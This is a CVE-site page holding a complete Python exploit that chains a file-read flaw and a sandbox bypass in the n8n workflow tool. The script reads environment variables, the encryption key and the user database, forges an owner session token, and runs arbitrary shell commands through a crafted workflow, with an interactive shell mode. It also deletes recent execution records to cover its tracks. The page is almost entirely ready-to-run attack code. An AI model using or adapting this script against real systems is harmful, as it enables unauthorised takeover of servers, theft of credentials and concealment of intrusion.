5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain Exploit
Arbitrary File Read → Admin Token Forge → Sandbox Bypass → RCE

Author: Chocapikk
GitHub: https://github.com/Chocapikk/CVE-2026-21858
"""

import argparse
import hashlib
import json
import logging
import os
import secrets
import sqlite3
import string
import tempfile
from base64 import b64encode

import jwt
import requests

logging.basicConfig(format="%(message)s", level=logging.INFO)
logger = logging.getLogger(__name__)

BANNER = """
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain          ║
║     Arbitrary File Read → Token Forge → Sandbox Bypass → RCE  ║
║                                                               ║
║     by Chocapikk                                              ║
╚═══════════════════════════════════════════════════════════════╝
"""

RCE_PAYLOAD = '={{ (function() { var require = this.process.mainModule.require; var execSync = require("child_process").execSync; return execSync("CMD").toString(); })() }}'


def randstr(n: int = 12) -> str:
    return "".join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(n))


def randpos() -> list[int]:
    return [secrets.randbelow(500) + 100, secrets.randbelow(500) + 100]


class Ni8mare:
    def __init__(self, base_url: str, form_path: str):
        self.base_url = base_url.rstrip("/")
        self.form_url = f"{self.base_url}/{form_path.lstrip('/')}"
        self.session = requests.Session()
        self.admin_token = None

    def _api(self, method: str, path: str, **kwargs) -> requests.Response | None:
        kwargs.setdefault("timeout", 30)
        kwargs.setdefault("cookies", {"n8n-auth": self.admin_token} if self.admin_token else {})
        resp = self.session.request(method, f"{self.base_url}{path}", **kwargs)
        return resp if resp.ok else None

    def _lfi_payload(self, filepath: str) -> dict:
        return {
            "data": {},
            "files": {
                f"f-{randstr(6)}": {
                    "filepath": filepath,
                    "originalFilename": f"{randstr(8)}.bin",
                    "mimetype": "application/octet-stream",
                    "size": secrets.randbelow(90000) + 10000
                }
            }
        }

    def _build_nodes(self, command: str) -> tuple[list, dict, str, str]:
        trigger_name, rce_name = f"T-{randstr(8)}", f"R-{randstr(8)}"
        result_var = f"v{randstr(6)}"
        payload_value = RCE_PAYLOAD.replace("CMD", command.replace('"', '\\"'))
        nodes = [
            {"parameters": {}, "name": trigger_name, "type": "n8n-nodes-base.manualTrigger",
             "typeVersion": 1, "position": randpos(), "id": f"t-{randstr(12)}"},
            {"parameters": {"values": {"string": [{"name": result_var, "value": payload_value}]}},
             "name": rce_name, "type": "n8n-nodes-base.set", "typeVersion": 2,
             "position": randpos(), "id": f"r-{randstr(12)}"}
        ]
        connections = {trigger_name: {"main": [[{"node": rce_name, "type": "main", "index": 0}]]}}
        return nodes, connections, trigger_name, rce_name

    # ========== Arbitrary File Read (CVE-2026-21858) ==========

    def read_file(self, filepath: str, timeout: int = 30, retries: int = 1) -> bytes | None:
        for i in range(retries):
            try:
                resp = self.session.post(
                    self.form_url, json=self._lfi_payload(filepath),
                    headers={"Content-Type": "application/json"}, timeout=timeout
                )
                if resp.ok and resp.content:
                    return resp.content
            except requests.RequestException:
                pass
            if i < retries - 1:
                import time
                time.sleep(2)
        return None

    def get_version(self) -> tuple[str, bool]:
        resp = self._api("GET", "/rest/settings", timeout=10)
        version = resp.json().get("data", {}).get("versionCli", "0.0.0") if resp else "0.0.0"
        major, minor = map(int, version.split(".")[:2])
        return version, major < 1 or (major == 1 and minor < 121)

    def get_home(self) -> str | None:
        data = self.read_file("/proc/self/environ")
        if not data:
            return None
        for var in data.split(b"\x00"):
            if var.startswith(b"HOME="):
                return var.decode().split("=", 1)[1]
        return None

    def get_key(self, home: str) -> str | None:
        data = self.read_file(f"{home}/.n8n/config")
        return json.loads(data).get("encryptionKey") if data else None

    def get_db(self, home: str) -> bytes | None:
        return self.read_file(f"{home}/.n8n/database.sqlite", timeout=120, retries=3)

    def extract_admin(self, db: bytes) -> tuple[str, str, str] | None:
        tmp = tempfile.NamedTemporaryFile(suffix=".db", delete=False)
        try:
            tmp.write(db)
            tmp.close()
            conn = sqlite3.connect(tmp.name)
            row = conn.execute("SELECT id, email, password FROM user WHERE role='global:owner' LIMIT 1").fetchone()
            conn.close()
        finally:
            os.unlink(tmp.name)
        return (row[0], row[1], row[2]) if row else None

    def forge_token(self, key: str, uid: str, email: str, pw_hash: str) -> str:
        secret = hashlib.sha256(key[::2].encode()).hexdigest()
        h = b64encode(hashlib.sha256(f"{email}:{pw_hash}".encode()).digest()).decode()[:10]
        self.admin_token = jwt.encode({"id": uid, "hash": h}, secret, "HS256")
        return self.admin_token

    def verify_token(self) -> bool:
        return self._api("GET", "/rest/users", timeout=10) is not None

    # ========== RCE (CVE-2025-68613) ==========

    def rce(self, command: str) -> str | None:
        nodes, connections, _, _ = self._build_nodes(command)
        wf_name = f"wf-{randstr(16)}"
        workflow = {"name": wf_name, "active": False, "nodes": nodes,
                    "connections": connections, "settings": {}}

        resp = self._api("POST", "/rest/workflows", json=workflow, timeout=10)
        if not resp:
            return None
        wf_id = resp.json().get("data", {}).get("id")
        if not wf_id:
            return None

        run_data = {"workflowData": {"id": wf_id, "name": wf_name, "active": False,
                                      "nodes": nodes, "connections": connections, "settings": {}}}
        resp = self._api("POST", f"/rest/workflows/{wf_id}/run", json=run_data, timeout=30)
        if not resp:
            self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
            return None

        exec_id = resp.json().get("data", {}).get("executionId")
        result = self._get_result(exec_id) if exec_id else None
        self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
        return result

    def _get_result(self, exec_id: str) -> str | None:
        resp = self._api("GET", f"/rest/executions/{exec_id}", timeout=10)
        if not resp:
            return None
        data = resp.json().get("data", {}).get("data")
        if not data:
            return None
        parsed = json.loads(data)
        for item in reversed(parsed):
            if isinstance(item, str) and len(item) > 3 and item not in ("success", "error"):
                return item.strip()
        return None

    # ========== Full Chain ==========

    def pwn(self) -> bool:
        home = self.get_home()
        if not home:
            logger.error("HOME directory: Not found")
            return False
        logger.info("HOME directory: %s", home)

        key = self.get_key(home)
        if not key:
            logger.error("Encryption key: Failed")
            return False
        logger.info("Encryption key: %s...", key[:8])

        db = self.get_db(home)
        if not db:
            logger.error("Database: Failed")
            return False
        logger.info("Database: %d bytes", len(db))

        admin = self.extract_admin(db)
        if not admin:
            logger.error("Admin user: Not found")
            return False
        uid, email, pw = admin
        logger.info("Admin user: %s", email)

        self.forge_token(key, uid, email, pw)
        logger.info("Token forge: OK")

        if not self.verify_token():
            logger.error("Admin access: Rejected")
            return False
        logger.info("Admin access: GRANTED!")

        logger.info("Cookie: n8n-auth=%s", self.admin_token)

        self._cleanup_executions()
        logger.info("Cleanup: OK")

        return True

    def _cleanup_executions(self) -> None:
        # Each LFI read stores the returned file as execution binary data.
        # Reading database.sqlite causes exponential growth (the DB contains itself).
        # Delete recent execution records (last 1 minute) and VACUUM to reclaim space.
        js = (
            "var s = require('sqlite3');\n"
            "var d = new s.Database(process.env.HOME + '/.n8n/database.sqlite');\n"
            "d.run(\"DELETE FROM execution_data WHERE executionId IN "
            "(SELECT id FROM execution_entity WHERE startedAt >= datetime('now', '-1 minutes'))\", function() {\n"
            "  d.run(\"DELETE FROM execution_entity WHERE startedAt >= datetime('now', '-1 minutes')\", function() {\n"
            "    d.run(\"VACUUM\", function() { d.close() });\n"
            "  });\n"
            "});\n"
        )
        self.rce(f"echo {b64encode(js.encode()).decode()} | base64 -d | node")


def parse_args():
    p = argparse.ArgumentParser(description="n8n Ni8mare - Full Chain Exploit")
    p.add_argument("url", help="Target URL (http://target:5678)")
    p.add_argument("form", help="Form path (/form/upload)")
    p.add_argument("--read", metavar="PATH", help="Read arbitrary file")
    p.add_argument("--cmd", metavar="CMD", help="Execute single command")
    p.add_argument("-o", "--output", metavar="FILE", help="Save LFI output to file")
    return p.parse_args()


def run_read(exploit: Ni8mare, path: str, output: str | None) -> None:
    data = exploit.read_file(path)
    if not data:
        logger.error("File read failed")
        return
    logger.info("%d bytes", len(data))
    if output:
        with open(output, "wb") as f:
            f.write(data)
        logger.info("Saved: %s", output)
        return
    print(data.decode())


def run_cmd(exploit: Ni8mare, cmd: str) -> None:
    out = exploit.rce(cmd)
    if not out:
        logger.error("RCE: Failed")
        return
    logger.info("RCE: OK")
    print(f"\n{out}")


def run_shell(exploit: Ni8mare) -> None:
    logger.info("Interactive mode (type 'exit' to quit)")
    while True:
        try:
            cmd = input("n8n> ").strip()
        except (EOFError, KeyboardInterrupt):
            print()
            return
        if not cmd or cmd == "exit":
            return
        out = exploit.rce(cmd)
        if out:
            print(out)


def main():
    print(BANNER)
    args = parse_args()

    exploit = Ni8mare(args.url, args.form)
    version, vuln = exploit.get_version()
    logger.info("Target: %s", exploit.form_url)
    logger.info("Version: %s (%s)", version, "VULN" if vuln else "SAFE")

    if args.read:
        run_read(exploit, args.read, args.output)
        return

    if not exploit.pwn():
        return

    if args.cmd:
        run_cmd(exploit, args.cmd)
        return

    run_shell(exploit)


if __name__ == "__main__":
    main()